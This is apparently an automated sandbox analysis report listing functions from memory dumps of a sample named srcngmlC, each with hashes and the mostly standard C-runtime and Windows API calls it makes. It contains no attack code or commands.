Source File: 00000005.00000002.1875026692.000000003003D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3003D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3003d000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe40e47ea2b82e4a7b903cef03fcd0871e9ba428126ed21d70c110ac9720125a
Instruction ID: b4fad4d26ee8551fc1e67a433f314236dd9335cb9434e9e5455b61b420cd8682
Opcode Fuzzy Hash: fe40e47ea2b82e4a7b903cef03fcd0871e9ba428126ed21d70c110ac9720125a
Instruction Fuzzy Hash: 1C01F77940A3009AE3164E25D980B57BFD8DF41765F18C4EBED280A146C679D841CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 3556DEC2 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05fec1afd4bca2b7500029c057d90c66e64d8e6d6ce9a7afe030eba6d9e75006
Instruction ID: 60fd3440b65d4b1d65c2af9fa337474577d448c9f11dba04e7dfd716c89b9754
Opcode Fuzzy Hash: 05fec1afd4bca2b7500029c057d90c66e64d8e6d6ce9a7afe030eba6d9e75006
Instruction Fuzzy Hash: 6B019271A21A099FCB067F78D4184AD3B75FF85301B00861BF545B7220EF309596DBC2

Uniqueness

Uniqueness Score: -1.00%

Function 3556DEA2 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f22033e36ff33ae0a287d91cb257f1535056464c503ee51acab8acd9ab0e03a
Instruction ID: 3ab231679485e4a3b87343d43b52ce7a0b4c9567b8b060a9b09ee5cfd81c22ba
Opcode Fuzzy Hash: 9f22033e36ff33ae0a287d91cb257f1535056464c503ee51acab8acd9ab0e03a
Instruction Fuzzy Hash: FF017C36521A4DDFCB02BF78E8184AD7B70FF85641B00825BF54977120EF30A296DB92

Uniqueness

Uniqueness Score: -1.00%

Function 35562028 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b453dd0e225e9693b1ce90727a7ac1142024dab8354ee0a1aa235a2e1664d9b
Instruction ID: fb268a58ff94d53e4fa87431d8afec778519a9427f43a718eccc2e3ea6d6d745
Opcode Fuzzy Hash: 0b453dd0e225e9693b1ce90727a7ac1142024dab8354ee0a1aa235a2e1664d9b
Instruction Fuzzy Hash: 58012978A00244CFD704DB70C558B5C77B2FB89329F505499E40BAB2A5CF39AC82CB55

Uniqueness

Uniqueness Score: -1.00%

Function 35563018 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31fd3ac99d543d9e40bfd73ce3309a6ed455f563e18a4e4aaaae4d1cfb7136d1
Instruction ID: 4bed6ca9b87235a2daaafa02f1fc6b4532c50900246199b5efadc03181d2a0b9
Opcode Fuzzy Hash: 31fd3ac99d543d9e40bfd73ce3309a6ed455f563e18a4e4aaaae4d1cfb7136d1
Instruction Fuzzy Hash: 3201D8B45421096FCB05D7B8DA8099DBFB5FF41344B4086E8D0056F26ACF712E8687D2

Uniqueness

Uniqueness Score: -1.00%

Function 3556FBF2 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e2cb692f88ff18c6627f7007837908243f976af8ee0c711af3c9c8a146b9c69
Instruction ID: 67521ecf362ab22120c2594d0b1bdfe30b8cc3d7539878bc9e25ff3601ba3a66
Opcode Fuzzy Hash: 4e2cb692f88ff18c6627f7007837908243f976af8ee0c711af3c9c8a146b9c69
Instruction Fuzzy Hash: 99F0C875B042449FEB00DAA4E94568E7BB5EF4125CF118466D909D7305D671EA068780

Uniqueness

Uniqueness Score: -1.00%

Function 35563028 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c807505d6e245abb403dea6bfaeeca88a7d77604f0fbb766ad69468fc63d41dc
Instruction ID: c492ce101fdddf49d73dc3591ecd9e3dc97ad45ce7ba2208c4eb1837fcba82cd
Opcode Fuzzy Hash: c807505d6e245abb403dea6bfaeeca88a7d77604f0fbb766ad69468fc63d41dc
Instruction Fuzzy Hash: 01013674941109AFDF04EBF8E99099DB7B5FB40304F5086B5C0056B259DF716F8A87D1

Uniqueness

Uniqueness Score: -1.00%

Function 35564FC0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e299959c5b53f3d5c6089b3169976bdc4c0c6970f14b538b8220d2749e9c8e76
Instruction ID: 51e0fb28aa04e524d9cc10a32ad2321a47154ad39bb6bf4006c0007875ea6f1a
Opcode Fuzzy Hash: e299959c5b53f3d5c6089b3169976bdc4c0c6970f14b538b8220d2749e9c8e76
Instruction Fuzzy Hash: 73D0A9BA2026644F8B162AB0A1141EA3F549A852A9302808BE0C867226CF304E029780

Uniqueness

Uniqueness Score: -1.00%

Function 35564FD0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a022ca54e822c73afde60331bad2ebd57b8f0fe4f8cc4dce94441c2bbcc810b
Instruction ID: 312cf2bff268e824ee86e38c83eb4c01f98ae5980342cf4a0b5fdbc23d564b33
Opcode Fuzzy Hash: 3a022ca54e822c73afde60331bad2ebd57b8f0fe4f8cc4dce94441c2bbcc810b
Instruction Fuzzy Hash: 86C09B312113255B4A1477F9E4448DF779DDA855653008157F54D53301DEB5AC1247D9

Uniqueness

Uniqueness Score: -1.00%

Function 35562094 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1880435036.0000000035560000.00000040.00000800.00020000.00000000.sdmp, Offset: 35560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_35560000_srcngmlC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c67e8fcc978cc12576433c755b7dc27b6aca986fefc31e32c1c3537af3b178a8
Instruction ID: 289cea32f71e6d9cf8a88e7b515c35ece0577ef34d41b4f4a4fcbaf190f5ce1c
Opcode Fuzzy Hash: c67e8fcc978cc12576433c755b7dc27b6aca986fefc31e32c1c3537af3b178a8
Instruction Fuzzy Hash: 8FC08C255451C8CBEB009694A40C2CCBB74E78027AF8020A3D51A620068BA920EAC7AA

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1851440244.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1851440244.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6

Memory Dump Source

Source File: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1851440244.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569

Uniqueness

Uniqueness Score: -1.00%

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: dcd0ffeba55ff02fe10acfaeba0fa9d55be123b2b31187241ea46178cf7d6550
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

EntryPoint.SRCNGMLC(80070057), ref: 004017EE

Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030

EntryPoint.SRCNGMLC(80070057), ref: 00401800
EntryPoint.SRCNGMLC(80070057), ref: 00401813
__recalloc.LIBCMT ref: 00401828
EntryPoint.SRCNGMLC(8007000E), ref: 00401839
EntryPoint.SRCNGMLC(8007000E), ref: 00401853
_calloc.LIBCMT ref: 00401861

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
String ID:
API String ID: 1721462702-0
Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE

Uniqueness

Uniqueness Score: -1.00%

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(00422910), ref: 00414050

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

IsProcessorFeaturePresent, xrefs: 0041361F
KERNEL32, xrefs: 00413610

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148COMMON

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00405D54
_memset.LIBCMT ref: 00405D6F
_fseek.LIBCMT ref: 00405DDD

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

Uniqueness

Uniqueness Score: -1.00%

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1683699497.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_srcngmlC.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
